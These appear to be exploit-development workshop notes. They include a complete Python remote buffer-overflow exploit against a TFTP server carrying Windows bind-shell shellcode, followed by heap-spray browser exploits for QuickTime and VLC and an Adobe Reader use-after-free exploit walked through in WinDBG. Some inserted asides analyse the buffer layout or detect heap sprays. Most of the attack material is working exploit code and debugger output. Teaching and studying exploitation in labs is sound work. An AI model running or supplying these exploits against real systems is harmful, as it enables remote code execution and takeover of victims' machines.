part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
part1 += "\xf5\xad\x57\xff\xd6\x53\x53"


part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"


STACK SHIFTER:
prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
prepend += "\x44" # inc esp
# net effect: esp -= 0x1000. The code runs at ESP (JMP ESP), so without this the shellcode's own
# pushes and calls would overwrite the bytes it is executing. -0x1001 plus "inc esp" is used instead
# of a plain add esp,-0x1000 because the immediate 0xFFFFF000 contains a null byte (which would end
# the TFTP filename) and 0xFFFFEFFF does not.


---- final script ----

#!/usr/bin/python2
# TFTP Server remote Buffer Overflow

import sys
import socket
import struct

if len(sys.argv) < 2:
    sys.stderr.write("Usage: tftpd.py <host>\n")
    sys.exit(1)

target = sys.argv[1]
port = 69

eip = 0x7e429353 # jmp esp in USER32.DLL

# shellcode part 1 (the original had "part1 +=" here, which fails because part1 does not exist yet)
part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
part1 += "\xf5\xad\x57\xff\xd6\x53\x53"

# shellcode part 2
part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"

prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
prepend += "\x44" # inc esp

buf = "\x00\x01" # TFTP opcode 1: read request (RRQ)

buf += "\x90" * (256 - len(part2)) # NOPs
buf += part2 # shellcode part 2
buf += struct.pack('<I', eip) # EIP (JMP ESP)
buf += prepend # stack shifter
buf += part1 # shellcode part 1
buf += "\xE9" + struct.pack('<i', -380) # JMP -380
buf += "\x00" # END

# print buf

# buf = "\x00\x01" # receive command
# buf += "A" * 300 + "\x00"

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

try:
    sock.connect((target, port))
    sock.sendall(buf)
except Exception as e:
    sys.stderr.write("Cannot send to " + str(target) + " : " + str(port) + " : " + str(e) + "!\n")
finally:
    sock.close()
sys.stderr.write("Sent.\n")



-----------------------------------------------------------------------------------------------------------------


How does all of this actually work


Total shellcode length: 315

Part1: 150
Part2: 165


NOPS * (256 - 165)

91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
|<--------------- 256 --------------->|<-- 260 -->|<-------- 150 ........ (410) -------->|
    ^                                                                                     |
    |<------------------------------------ neg jmp -380 ----------------------------------|
Jump to the 30 byte mark (inside the NOPs, which slide into shellcode p2)
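The byte accounting behind the sketch above, as an added Python 3 example that is not part of the lab files. It lays out the final script's buffer from the lengths of its pieces and reports where the JMP -380 lands. Counted from the strings in the final script, part1 and part2 are 151 and 166 bytes (the Size=317 in the msf comment agrees), one more each than the rounded figures in the sketch, so both sets of numbers are run. The second function explains the odd -0x1001 in the stack shifter. Function names are mine.

```python
import struct


def tftpd_layout(part1_len, part2_len, jmp_rel=-380, nop_region=256,
                 opcode_len=2, ret_len=4, shifter_len=7, jmp_len=5):
    """Offsets of each piece of the request buffer and where the backwards JMP lands.

    Layout (from the final script): opcode | NOPs | part2 | EIP | stack shifter | part1 | JMP rel32 | NUL
    After the overwritten return address is popped, ESP points at the stack shifter, so
    execution runs shifter -> part1 -> JMP; a rel32 jump is relative to the end of the JMP.
    """
    regions = {}
    pos = 0
    for name, size in (("opcode", opcode_len), ("nops", nop_region - part2_len),
                       ("part2", part2_len), ("eip", ret_len), ("shifter", shifter_len),
                       ("part1", part1_len), ("jmp", jmp_len)):
        regions[name] = (pos, pos + size)
        pos += size
    landing = regions["jmp"][1] + jmp_rel
    nop_start, nop_end = regions["nops"]
    return {
        "regions": regions,
        "total": pos + 1,                                # plus the trailing NUL
        "landing": landing,
        "lands_in_nops": nop_start <= landing < nop_end,
        "nops_before_part2": nop_end - landing,
    }


def shifter_immediates():
    """Why the stack shifter is add esp,-0x1001 ; inc esp rather than add esp,-0x1000."""
    return {
        "minus_0x1000": struct.pack("<i", -0x1000),      # b'\x00\xf0\xff\xff': the NUL would end the TFTP filename
        "minus_0x1001": struct.pack("<i", -0x1001),      # b'\xff\xef\xff\xff': no NUL
        "net_shift": -0x1001 + 1,                        # inc esp brings it back to exactly -0x1000
    }


if __name__ == "__main__":
    print(tftpd_layout(151, 166))   # lengths counted from the strings in the final script: lands at 45
    print(tftpd_layout(150, 165))   # the rounded figures in the sketch above: lands at 44
    print(shifter_immediates())
```

Either way the jump lands well inside the NOP sled (about 45 bytes into the buffer, with some 47 NOPs left before part2), which is what makes the off-by-one in the sketch harmless; a layout check like this is how you find out before sending anything whether a jump would land short of the sled or inside part2.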


############################
# Lab 3: Browsers Exploits #
############################

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000

<object id="quicktime" clsid="999-999999-99-99999">
<param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
</object>

var buf = "";
for (var i = 0; i < 50000; i++)
    buf += "A";
var myobject = document.getElementById("quicktime");
myobject.url = buf;

YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!

- Browsers (Flash)
- PDF
- MS Office / OOo

VLC smb:// exploit
------------------

EXPLOIT VECTOR

smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}

Exploit Scripts
- ffvlc

ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080

perl daemon.pl vlc0.html

ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
Browse to http://your_host_ip_address:8080/

vlc0.html
---------
<script>
var buf = "";
for (var i = 0; i < 1250; i++)
    buf += unescape("%41%41%41%41");
var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
</script>

  973. vlc1.html
  974. ---------
  975. <script>
  976.  
  977. // shellcode created in heap memory
  978. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  979.  
  980. // 800K block of NOPS
  981. var nop = unescape("%u9090%u9090"); // 4 NOPS
  982. while(nop.length < 0xc0000) {
  983. nop += nop;
  984. }
  985.  
  986. // spray the heap with NOP+shellcode
  987. var memory = new Array();
  988. for(i = 0; i < 50; i++) {
  989. memory[i] = nop + shellcode;
  990. }
  991.  
  992. // build the exploit payload
  993. var buf = "";
  994. for(i = 0; i < 1250; i++)
  995. buf += unescape("%41%41%41%41");
  996. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  997.  
  998. // trigger the exploit
  999. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  1000. </script>
  1001.  
  1002. perl daemon.pl vlc1.html
  1003.  
  1004. Search for where our NOPS+shellcode lies in the heap
  1005.  
  1006. s 0 l fffffff 90 90 90 90 cc cc cc cc
  1007.  
  1008. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  1009. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1010. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1011. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1012. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1013. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1014. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1015. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1016. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1017. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1018. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1019. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1020. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1021. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1022. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1023. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1024. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  1025.  
  1026. Edit vlc2.html
  1027. replace %41%41%41%41 with %07%07%07%07
  1028.  
  1029. (928.fd0): Break instruction exception - code 80000003 (first chance)
  1030. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  1031. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  1032. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1033. 07100000 cc int 3
  1034. 0:019> u
  1035. 07100000 cc int 3
  1036. 07100001 cc int 3
  1037. 07100002 cc int 3
  1038. 07100003 cc int 3
  1039. 07100004 cc int 3
  1040. 07100005 cc int 3
  1041. 07100006 cc int 3
  1042. 07100007 cc int 3
  1043.  
  1044. Create vlc3.html (Copy vlc2.html to vlc3.html)
  1045. ----------------------------------------------
  1046. Win32 Reverse Shell
  1047. - no restricted characters
  1048. - Encoder NONE
  1049. - use the Javascript encoded payload generated by msfweb
  1050.  
  1051.  
  1052.  
  1053.  
  1054. #######################
  1055. # Lab 4: PDF EXPLOITS #
  1056. #######################
  1057.  
  1058.  
  1059. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab4\adobe_mnp_skeleton
  1060. Acrobat Media newPlayer exploit
  1061. -------------------------------
  1062.  
  1063. Use-after-free bug
  1064.  
  1065. Exploit scripts are online at 172.16.0.100
  1066. - adobe_mnp
  1067.  
  1068. Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
  1069.  
  1070.  
  1071. mnp0.pdf
  1072.  
  1073. - Open up acrobat reader
  1074. - WinDBG
  1075. - F6 attach to AcroRd32.exe
  1076. - g to Go
  1077.  
  1078. EIP = 41414141
  1079.  
  1080. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  1081.  
  1082. mnp1.pdf
  1083.  
  1084. All we are doing is changing EIP to 0c0c0c0c.
  1085. There is no heap spray in this one.
  1086.  
  1087. This exception may be expected and handled.
  1088. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  1089. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  1090. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  1091. 0c0c0c0c ?? ???
  1092.  
  1093. We know we get EIP control
  1094.  
  1095. mnp2.pdf
  1096.  
  1097. Put in the heap spray.
  1098.  
  1099. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  1100.  
  1101. var nops = unescape("%u9090%u9090");
  1102.  
  1103. while(nops.length <= 32768)
  1104. nops += nops;
  1105. nops = nops.substring(0,32768 - shellcode.length);
  1106.  
  1107. memory = new Array();
  1108.  
  1109. for(i = 0; i < 1500; i++) {
  1110. memory[i] = nops + shellcode;
  1111. }
  1112.  
  1113. 1500 NOP+shellcode blocks of 32K NOPs each
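As an added defensive example (not the workshop's code), a small Python analyzer for the spray shape used by vlc1.html above and by the mnp2.pdf spray: it decodes `unescape()` literals into the UTF-16LE bytes the string occupies in memory (the byte pattern the `s 0 l fffffff 90 90 90 90 cc cc cc cc` search looks for), flags sled runs and all-int3 stubs, and recognises the double-the-string-then-fill-an-array loop. The sample script is constructed to mirror vlc1.html; the names and the `min_sled` threshold are this example's own.

```python
import re
# Constructed sample in the shape of the workshop's vlc1.html spray (added here, not the page's file).
SPRAY_JS = """
var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
var nop = unescape("%u9090%u9090");
while(nop.length < 0xc0000) { nop += nop; }
var memory = new Array();
for(i = 0; i < 50; i++) { memory[i] = nop + shellcode; }
"""
BENIGN_JS = 'var greeting = unescape("%48%65%6c%6c%6f");'  # "Hello": no sled, no spray

LITERAL_RE = re.compile(r'unescape\(\s*"([^"]*)"\s*\)')
TOKEN_RE = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)', re.S)
DOUBLING_RE = re.compile(r'(\w+)\s*\+=\s*\1\b')                          # nop += nop
FILL_RE = re.compile(r'(\w+)\s*\[\s*\w+\s*\]\s*=\s*(\w+)\s*\+\s*(\w+)')  # memory[i] = nop + shellcode
SLED_BYTES = {0x90, 0x0C}  # nop, and the 0c0c "or al,0Ch" filler used by the mnp3.pdf variant

def js_unescape_bytes(literal):
    """Decode an unescape() literal into the UTF-16LE bytes the JS string occupies in memory."""
    units = []
    for m in TOKEN_RE.finditer(literal):
        hexval = m.group(1) or m.group(2)
        units.append(int(hexval, 16) if hexval else ord(m.group(3)))
    return b"".join(u.to_bytes(2, "little") for u in units)

def longest_run(data):
    """Return (length, byte) of the longest run of one repeated byte value."""
    best, cur, prev = (0, None), 0, None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        if cur > best[0]:
            best = (cur, b)
    return best

def analyze(js, min_sled=4):
    """Flag literals that decode to a sled or an int3 stub, and the double-then-fill spray loop."""
    findings = {"sled_literals": [], "int3_literals": [], "spray_loop": False}
    for m in LITERAL_RE.finditer(js):
        data = js_unescape_bytes(m.group(1))
        run_len, run_byte = longest_run(data)
        if run_byte == 0xCC and run_len == len(data):   # all-int3 placeholder "shellcode"
            findings["int3_literals"].append(len(data))
        elif run_byte in SLED_BYTES and run_len >= min_sled:
            findings["sled_literals"].append((run_byte, run_len))
    doubled = {m.group(1) for m in DOUBLING_RE.finditer(js)}   # strings grown by x += x
    for m in FILL_RE.finditer(js):
        if m.group(2) in doubled or m.group(3) in doubled:
            findings["spray_loop"] = True
    return findings
```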
  1114.  
  1115. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  1116.  
  1117. We want to see what led to the crash.
  1118.  
  1119. EIP is invalid, so we can't disassemble around EIP
  1120.  
  1121. We need to trace the function that called us and crashed.
  1122. - STACK TRACE
  1123. - dumps all the frames from the top of the stack
  1124. - shows you the series of calls that led up to the crash
  1125. - we will analyze the function in the topmost frame
  1126.  
  1127. WinDBG - stack trace - "k" command
  1128.  
  1129. 0:000> k
  1130. ChildEBP RetAddr
  1131. WARNING: Frame IP not in any known module. Following frames may be wrong.
  1132. 0013fb34 2d843117 0x90909090
  1133. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  1134. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  1135. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  1136. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  1137. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  1138. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  1139. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  1140. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  1141. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  1142. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  1143. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  1144. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  1145. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  1146. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  1147. 0013ffc0 7c817067 AcroRd32+0x4004
  1148. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  1149.  
  1150. 2d843117 -- the return address that we would have returned to, if we didn't crash.
  1151. Just before 2d843117 (around 2d843117-2) there will be a CALL instruction.
  1152.  
  1153. u 2d843117
  1154. u 2d843117-2
  1155. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
  1156. u 2d843117-4
  1157.  
  1158. 0:000> u 2d843117-3
  1159. Multimedia!PlugInMain+0x41b66:
  1160. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
  1161. 2d843117 6a00 push 0
  1162. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
  1163. 2d84311e 56 push esi
  1164. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
  1165. 2d843124 83c40c add esp,0Ch
  1166. 2d843127 66b80100 mov ax,1
  1167. 2d84312b 5e pop esi
  1168.  
  1169. We control EDX
  1170. edx=0c0c0c0c
  1171.  
  1172. call [edx+4] = call [0c0c0c10]
  1173. dd edx+4
  1174.  
  1175. 0:000> dd edx+4
  1176. 0c0c0c10 90909090 90909090 90909090 90909090
  1177. 0c0c0c20 90909090 90909090 90909090 90909090
  1178.  
  1179. 0:000> u 2d843117-7
  1180. Multimedia!PlugInMain+0x41b62:
  1181. 2d843110 8b10 mov edx,dword ptr [eax]
  1182. 2d843112 8bc8 mov ecx,eax
  1183. 2d843114 ff5204 call dword ptr [edx+4]
  1184.  
  1185. dd eax
  1186.  
  1187. 0:000> dd eax
  1188. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
  1189. 02e2d690 42424242 42424242 42424242 42424242
  1190. 02e2d6a0 42424242 42424242 42424242 42424242
  1191. 02e2d6b0 42424242 42424242 42424242 42424242
  1192. 02e2d6c0 42424242 42424242 00000000 00000000
  1193.  
  1194. mnp3.pdf
  1195.  
  1196. change the NOPs 90909090 to 0c0c0c0c
  1197.  
  1198. mov edx, [eax]
  1199. call [edx+4]
  1200.  
  1201. edx = 0c0c0c0c
  1202. edx+4 = 0c0c0c10
  1203. contents at edx+4 will also be "0c0c0c0c"
  1204.  
  1205. EIP will jump to 0c0c0c0c
  1206.  
  1207. and...
  1208.  
  1209. 0:000> u 0c0c0c0c
  1210. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
  1211. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
  1212. 0c0c0c0c 0c0c or al,0Ch
  1213. 0c0c0c0e 0c0c or al,0Ch
  1214. 0c0c0c10 0c0c or al,0Ch
  1215. 0c0c0c12 0c0c or al,0Ch
  1216. 0c0c0c14 0c0c or al,0Ch